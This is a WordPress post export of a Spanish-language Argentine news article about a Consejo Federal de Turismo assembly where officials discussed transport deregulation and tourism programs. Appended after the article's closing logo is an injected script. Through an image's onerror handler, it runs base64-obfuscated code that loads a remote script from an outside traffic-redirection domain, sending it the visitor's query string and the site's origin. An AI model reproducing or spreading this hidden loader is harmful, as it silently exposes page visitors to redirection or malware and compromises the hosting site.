{"id":16296,"date":"2024-08-07T10:39:32","date_gmt":"2024-08-07T13:39:32","guid":{"rendered":"https:\/\/nubesmgzdigital.com.ar\/?p=16296"},"modified":"2025-08-13T15:50:12","modified_gmt":"2025-08-13T18:50:12","slug":"sturzenegger-y-scioli-encabezaron-la-asamblea-del-cft","status":"publish","type":"post","link":"https:\/\/nubesmgzdigital.com.ar\/index.php\/2024\/08\/07\/sturzenegger-y-scioli-encabezaron-la-asamblea-del-cft\/","title":{"rendered":"Sturzenegger y Scioli encabezaron la asamblea del CFT"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-93d1081dc9823ff03750aeda23bad99f\" style=\"background-color:#02507d\"><em>Los avances en la desregulaci\u00f3n del transporte en todas sus v\u00edas para impulsar el turismo y el lanzamiento de un programa para incrementar el turismo de reuniones fueron puntos destacados en la agenda.<\/em><\/h4>\n\n\n\n<p>El secretario de Turismo, Deportes y Ambiente de la Naci\u00f3n,\u00a0<strong>Daniel Scioli<\/strong>, particip\u00f3 hoy de la 168\u00aa asamblea del Consejo Federal de Turismo, en la que el ministro de Desregulaci\u00f3n y Transformaci\u00f3n del Estado de la Naci\u00f3n,\u00a0<strong>Federico Sturzenegger<\/strong>, subray\u00f3 la importancia de seguir avanzando en la desregulaci\u00f3n del transporte en todas sus v\u00edas como punto clave para impulsar la actividad tur\u00edstica en todo el pa\u00eds.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/autoridades_168_asamblea_del_cft.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p><em>&#8220;No hay desarrollo de la Argentina, sin un desarrollo de su industria tur\u00edstica. Ac\u00e1 estaremos trabajando junto con el presidente Milei y junto con nuestro querido secretario Daniel Scioli. Y vamos a estar a disposici\u00f3n para facilitarles que la Argentina pueda desarrollar esta industria tan central para el crecimiento del pa\u00eds. Si no hay conectividad, no hay turismo\u201d<\/em>, dijo el ministro.&nbsp;<em>\u201cLo que hicimos en transporte aerocomercial se aplicar\u00e1 tambi\u00e9n para el transporte terrestre. Es un proceso de desregulaci\u00f3n en el que se eliminar\u00e1n todas las barreras a la entrada a la industria\u201d<\/em>, puntualiz\u00f3, para se\u00f1alar luego que ya fue desregulado el uso de aeronaves de bajo porte para transporte de pasajeros.<\/p>\n\n\n\n<p><strong>Scioli<\/strong>&nbsp;destac\u00f3 la participaci\u00f3n del ministro Sturzenegger en el acto al indicar:&nbsp;<em>\u201cYa antes de asumir esta responsabilidad que me confi\u00f3 el presidente en Milei, ven\u00edamos trabajando, desde el inicio de la gesti\u00f3n, en todas las iniciativas que impactan muy positivamente en nuestro sector. Particularmente, en estas regulaciones, para hacerlo cada vez m\u00e1s competitivo\u201d<\/em>. Adem\u00e1s, asegur\u00f3:&nbsp;<em>\u201cTenemos una enorme responsabilidad, ya que este sector va camino a ser el mayor empleador mundial. Pero, para eso, tenemos que hacer cosas, no esperar a que los turistas vengan, salir a buscarlos, generar programas de promociones y todo lo que significa la vuelta del cr\u00e9dito y el impacto que tiene tambi\u00e9n en el sector\u201d<\/em>.<\/p>\n\n\n\n<p>Encabezada por el presidente del CFT,&nbsp;<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>, la asamblea tuvo una agenda que incluy\u00f3 tambi\u00e9n un an\u00e1lisis de&nbsp;<strong>Gustavo Santos<\/strong>&nbsp;-director regional para las Am\u00e9ricas de ONU Turismo- sobre \u201cLa situaci\u00f3n del turismo a nivel global y regional\u201d y un anticipo de los puntos principales del proyecto de reglamentaci\u00f3n del turismo estudiantil que apunta a la flexibilizaci\u00f3n de la actividad.<\/p>\n\n\n\n<p>En ese marco, tambi\u00e9n fue presentado el programa&nbsp;<strong>\u201cArgentina Te Incentiva\u201d<\/strong>, que busca incrementar el turismo de reuniones en diversos destinos nacionales, y el presidente de la FAEVYT, Andr\u00e9s Dey\u00e1, entreg\u00f3 las invitaciones para la pr\u00f3xima&nbsp;<strong>Feria Internacional de Turismo 2024<\/strong>, que se realizar\u00e1 en Buenos Aires del 28 de septiembre al 1 de octubre.<\/p>\n\n\n\n<p>Al finalizar la asamblea del\u00a0<strong>CFT<\/strong>,\u00a0<strong>Scioli<\/strong>\u00a0tambi\u00e9n encabez\u00f3 la apertura de una nueva edici\u00f3n del\u00a0<strong>MeetUp<\/strong>, organizado por\u00a0<strong>AOCA<\/strong>\u00a0-la entidad que nuclea al turismo de reuniones en la Argentina-, en el que participar\u00e1n los sectores p\u00fablico y privado del rubro de todo el pa\u00eds e invitados internacionales.<\/p>\n<p>\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/sturzenegger-y-scioli-encabezaron-la-asamblea-del-cft\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:312px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los avances en la desregulaci\u00f3n del transporte en todas sus v\u00edas para impulsar el turismo y el lanzamiento de un programa para incrementar el turismo de reuniones fueron puntos destacados en la agenda. El secretario de Turismo, Deportes y Ambiente de la Naci\u00f3n,\u00a0Daniel Scioli, particip\u00f3 hoy de la 168\u00aa asamblea del Consejo Federal de Turismo, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":16297,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[111],"tags":[],"class_list":["post-16296","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-nacional"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/16296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=16296"}],"version-history":[{"count":2,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/16296\/revisions"}],"predecessor-version":[{"id":19030,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/16296\/revisions\/19030"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media\/16297"}],"wp:attachment":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=16296"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/categories?post=16296"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/tags?post=16296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}